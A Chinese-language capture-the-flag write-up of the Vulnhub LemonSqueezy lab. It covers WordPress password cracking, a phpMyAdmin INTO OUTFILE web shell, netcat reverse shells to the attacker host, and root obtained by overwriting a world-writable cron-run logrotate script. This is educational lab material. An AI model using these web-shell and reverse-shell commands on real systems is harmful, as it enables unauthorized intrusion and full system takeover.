Vulnhub之LemonSqueezy靶机详细测试过程
LemonSqueezy
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ sudo netdiscover -i eth1 -r 10.1.1.0/24
Currently scanning: 10.1.1.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.1.1.1 00:50:56:c0:00:01 1 60 VMware, Inc.
10.1.1.149 00:0c:29:8b:ab:c7 1 60 VMware, Inc.
10.1.1.254 00:50:56:ee:66:c6 1 60 VMware, Inc.
利用Kali Linux的netdiscover工具识别目标主机IP地址为10.1.1.149
NMAP扫描
──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ sudo nmap -sS -sV -sC -p- 10.1.1.149 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-24 08:34 EST
Nmap scan report for bogon (10.1.1.149)
Host is up (0.0011s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 00:0C:29:8B:AB:C7 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.88 seconds
NMAP扫描结果表明目标主机有1个开放端口:80(HTTP)
获得Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ nikto -h http://10.1.1.149
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.1.1.149
+ Target Hostname: 10.1.1.149
+ Target Port: 80
+ Start Time: 2023-02-24 08:35:50 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5a323b988acba, mtime: gzip
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7889 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2023-02-24 08:36:50 (GMT-5) (60 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
经测试/phpmyadmin没有弱口令。
──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
┌──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ gobuster dir -u http://10.1.1.149 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.1.1.149
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: sh,php,txt,html
[+] Timeout: 10s
===============================================================
2023/02/24 08:37:49 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10701]
/.php (Status: 403) [Size: 275]
/.html (Status: 403) [Size: 275]
/wordpress (Status: 301) [Size: 312] [--> http://10.1.1.149/wordpress/]
/manual (Status: 301) [Size: 309] [--> http://10.1.1.149/manual/]
/javascript (Status: 301) [Size: 313] [--> http://10.1.1.149/javascript/]
/phpmyadmin (Status: 301) [Size: 313] [--> http://10.1.1.149/phpmyadmin/]
/.html (Status: 403) [Size: 275]
/.php (Status: 403) [Size: 275]
/server-status (Status: 403) [Size: 275]
Progress: 1097394 / 1102805 (99.51%)
===============================================================
2023/02/24 08:39:13 Finished
===============================================================
gobuster工具扫描出/wordpress目录,利用Kali Linux浏览器访问该目录,状态栏重定向到:lemonsqueezy。
将该主机名添加到/etc/hosts文件中,然后刷新页面:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ sudo vim /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.1.1.149 lemonsqueezy
┌──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ wpscan --url http://lemonsqueezy/wordpress/ -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://lemonsqueezy/wordpress/ [10.1.1.149]
[+] Started: Fri Feb 24 08:55:28 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://lemonsqueezy/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://lemonsqueezy/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://lemonsqueezy/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://lemonsqueezy/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).
| Found By: Rss Generator (Passive Detection)
| - http://lemonsqueezy/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=4.8.9</generator>
| - http://lemonsqueezy/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8.9</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.1
| Style URL: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.8.9
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.8.9, Match: 'Version: 1.3'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] lemon
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://lemonsqueezy/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] orange
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Feb 24 08:55:32 2023
[+] Requests Done: 73
[+] Cached Requests: 7
[+] Data Sent: 18.24 KB
[+] Data Received: 19.996 MB
[+] Memory used: 254.246 MB
[+] Elapsed time: 00:00:03
wpscan工具扫描出用户名lemon, orange, 看是否可以破解出lemon的密码
┌──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ wpscan --url http://lemonsqueezy/wordpress/ -U lemon -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
运行了8分多钟没有破解出来密码。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ wpscan --url http://lemonsqueezy/wordpress/ --plugins-detection mixed
_______________________________________________________________
wpscan没有扫描出可利用的插件,看来还是需要破解密码。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ wpscan --url http://lemonsqueezy/wordpress/ -U orange -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://lemonsqueezy/wordpress/ [10.1.1.149]
[+] Started: Fri Feb 24 09:19:03 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://lemonsqueezy/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://lemonsqueezy/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://lemonsqueezy/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://lemonsqueezy/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).
| Found By: Rss Generator (Passive Detection)
| - http://lemonsqueezy/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=4.8.9</generator>
| - http://lemonsqueezy/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8.9</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.1
| Style URL: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.8.9
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.8.9, Match: 'Version: 1.3'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==============================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - orange / ginger
Trying orange / peanut Time: 00:00:01 < > (165 / 14344557) 0.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: orange, Password: ginger
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Feb 24 09:19:10 2023
[+] Requests Done: 338
[+] Cached Requests: 5
[+] Data Sent: 136.128 KB
[+] Data Received: 460.076 KB
[+] Memory used: 240.824 MB
[+] Elapsed time: 00:00:07
orange用户的密码很快就破解出来了,登录wordpress后台,如我们所料,orange不是管理员,也没有任何插件,但是在Posts中有个post,里面貌似有密码:n0t1n@w0rdl1st!
它会不会是phpmyadmin的密码
即:
用户名: orange
密码:n0t1n@w0rdl1st!
成功登录phpmyadmin
在phpmyadmin的SQL页面,输入以下命令:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/backdoor.php"
从而创建了backdoor.php文件
访问该文件:
http://10.1.1.149/wordpress/backdoor.php?cmd=whoami
访问url得到shell:
http://10.1.1.149/wordpress/backdoor.php?cmd=nc%20-e%20/bin/bash%2010.1.1.143%205555
┌──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [10.1.1.143] from (UNKNOWN) [10.1.1.149] 52462
www-data@lemonsqueezy:/var$ cd www
cd www
www-data@lemonsqueezy:/var/www$ ls -alh
ls -alh
total 16K
drwxr-xr-x 3 root root 4.0K Apr 26 2020 .
drwxr-xr-x 12 root root 4.0K Apr 13 2020 ..
drwxr-xr-x 3 root root 4.0K Apr 13 2020 html
-rw-r--r-- 1 root root 39 Apr 26 2020 user.txt
www-data@lemonsqueezy:/var/www$ cat user.txt
cat user.txt
TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH
www-data@lemonsqueezy:/var/www$
至此拿到了user flag.
提权
经过测试,无法在/tmp目录从Kali Linxu下载文件
www-data@lemonsqueezy:/tmp$ wget http://10.1.1.143:8000/linpeas.sh
wget http://10.1.1.143:8000/linpeas.sh
--2023-02-25 00:09:16-- http://10.1.1.143:8000/linpeas.sh
Connecting to 10.1.1.143:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828098 (809K) [text/x-sh]
linpeas.sh: No such file or directory
Cannot write to 'linpeas.sh' (No such file or directory).
需要更换到/var/www/html/wordpress目录下下载
www-data@lemonsqueezy:/var/www/html$ cd wordpress
cd wordpress
www-data@lemonsqueezy:/var/www/html/wordpress$ wget http://10.1.1.143:8000/linpeas.sh
<l/wordpress$ wget http://10.1.1.143:8000/linpeas.sh
--2023-02-25 00:12:07-- http://10.1.1.143:8000/linpeas.sh
Connecting to 10.1.1.143:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828098 (809K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 808.69K --.-KB/s in 0.002s
2023-02-25 00:12:08 (412 MB/s) - 'linpeas.sh' saved [828098/828098]
www-data@lemonsqueezy:/var/www/html/wordpress$ chmod +x linpeas.sh
chmod +x linpeas.sh
注意到:
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 * * * * root /etc/logrotate.d/logrotate
logrotate没两分钟就执行一次。
www-data@lemonsqueezy:/var/www/html/wordpress$ ls -alh /etc/logrotate.d/logrotate
<html/wordpress$ ls -alh /etc/logrotate.d/logrotate
-rwxrwxrwx 1 root root 101 Apr 26 2020 /etc/logrotate.d/logrotate
──(kali㉿kali)-[~/Desktop/Toolsets/pspy]
└─$ msfvenom -p cmd/unix/reverse_netcat LHOST=10.1.1.143 LPORT=6666 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 92 bytes
mkfifo /tmp/byvwp; nc 10.1.1.143 6666 0</tmp/byvwp | /bin/sh >/tmp/byvwp 2>&1; rm /tmp/byvwp
www-data@lemonsqueezy:/var/www/html/wordpress$ ls -alh /etc/logrotate.d/logrotate
<html/wordpress$ ls -alh /etc/logrotate.d/logrotate
-rwxrwxrwx 1 root root 101 Apr 26 2020 /etc/logrotate.d/logrotate
www-data@lemonsqueezy:/var/www/html/wordpress$ echo 'mkfifo /tmp/byvwp; nc 10.1.1.143 6666 0</tmp/byvwp | /bin/sh >/tmp/byvwp 2>&1; rm /tmp/byvwp' > /etc/logrotate.d/logrotate
<p 2>&1; rm /tmp/byvwp' > /etc/logrotate.d/logrotate
www-data@lemonsqueezy:/var/www/html/wordpress$
──(kali㉿kali)-[~/Desktop/Toolsets/pspy]
└─$ sudo nc -nlvp 6666
[sudo] password for kali:
listening on [any] 6666 ...
connect to [10.1.1.143] from (UNKNOWN) [10.1.1.149] 38734
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
root.txt
cat root.txt
NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4=
经验教训
- 虽然一般情况下对于wordpress站点来说,首先考虑的时候破解管理员的密码,然后是看是否有可利用的漏洞,如果这两条路都无法可行,那么别忘了要破解其他普通用户的密码,说不定作者隐藏了一些有价值的信息
STRIVE FOR PROGRESS,NOT FOR PERFECTION
